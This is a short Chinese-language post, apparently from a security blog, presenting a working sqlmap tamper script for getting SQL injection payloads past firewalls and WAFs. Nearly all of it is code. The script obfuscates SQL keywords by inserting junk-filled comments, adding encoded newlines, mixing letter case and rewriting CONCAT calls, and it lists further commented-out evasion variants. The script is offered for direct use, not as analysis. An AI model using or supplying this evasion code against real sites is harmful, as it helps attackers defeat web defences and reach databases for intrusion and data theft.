总结一下tamper
0x00 绕过防火墙
防火墙的规则肯定是没有WAF更新的那么快,所以要写一个比较实用的、容易变通的tamper:
#!/usr/bin/env python
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
if payload:
payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),")
payload = payload.replace("AND","/* (;.../+___io1d_6^1``)*/AND")
payload = payload.replace("SLEEP","sLEep")
payload = payload.replace("ASCII(", "ASCII/*i({].,$$!~!<)*/(")
payload = payload.replace("VARCHAR(", "VARCHAR/**/(")
payload = payload.replace("CHR(", "CHR/*io%!`;/.,-=+/2*/(")
payload = payload.replace("(SELECT", "/*`^~`\Ddhsjnnw_+ddsws//- */( SELECT")
payload = payload.replace("UNION", "/*PPdd{[;!`(_.,>?l}*/ UNION%0A")
payload = payload.replace("ORDER", "ORDER%0A")
payload = payload.replace("EXISTS", "EXISTS%0A")
payload = payload.replace("LIMIT", "LIMIT%0A")
#payload = payload.replace("SLEEP(5)","\"0\" LikE Sleep(5)")
#payload = payload.replace(" ","/*FFFFFFFFFFFFFFFFFFFFFFFFF*/")
#payload = payload.replace("--","-- x")
#p = re.compile(r'(\d+)=')
#payload = p.sub(r"'\1'LikE ", payload)
return payload